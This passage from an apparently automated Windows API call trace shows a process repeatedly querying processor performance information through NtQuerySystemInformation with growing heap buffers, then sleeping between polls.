0x29585b8 [0192.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0192.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0192.145] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.146] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0192.146] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0192.146] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.147] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0192.147] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.147] Sleep (dwMilliseconds=0x110) [0192.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0192.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0192.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0192.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0192.162] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0192.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.163] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0192.164] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.164] Sleep (dwMilliseconds=0x110) [0192.169] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0192.169] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0192.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0192.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0192.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0192.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0192.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.174] Sleep (dwMilliseconds=0x110) [0192.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0192.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0192.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0192.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0192.223] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0192.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.224] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0192.225] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.225] Sleep (dwMilliseconds=0x110) [0192.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0192.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0192.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0192.302] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.303] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0192.303] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0192.304] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0192.304] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.305] Sleep (dwMilliseconds=0x110) [0192.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0192.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0192.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0192.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0192.348] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0192.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.349] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0192.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.349] Sleep (dwMilliseconds=0x110) [0192.476] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0192.479] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.480] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.480] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0192.481] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0192.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0192.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0192.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0192.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.486] Sleep (dwMilliseconds=0x110) [0192.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0192.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0192.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0192.630] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.631] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0192.631] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0192.632] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.632] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0192.633] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.633] Sleep (dwMilliseconds=0x110) [0192.667] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0192.667] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.668] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.668] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0192.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0192.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0192.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0192.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0192.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.673] Sleep (dwMilliseconds=0x110) [0192.747] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0192.747] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0192.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0192.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0192.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0192.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0192.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.754] Sleep (dwMilliseconds=0x110) [0192.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0192.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0192.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0192.817] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.818] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0192.818] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0192.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.820] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0192.820] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.820] Sleep (dwMilliseconds=0x110) [0192.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0192.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.880] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0192.881] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.881] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.882] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0192.882] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0192.883] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.887] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0192.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0192.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0192.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0192.891] Sleep (dwMilliseconds=0x110) [0192.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.098] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.099] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.100] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.101] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.101] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.101] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.102] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.102] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.103] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.103] Sleep (dwMilliseconds=0x110) [0193.215] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.215] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.216] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 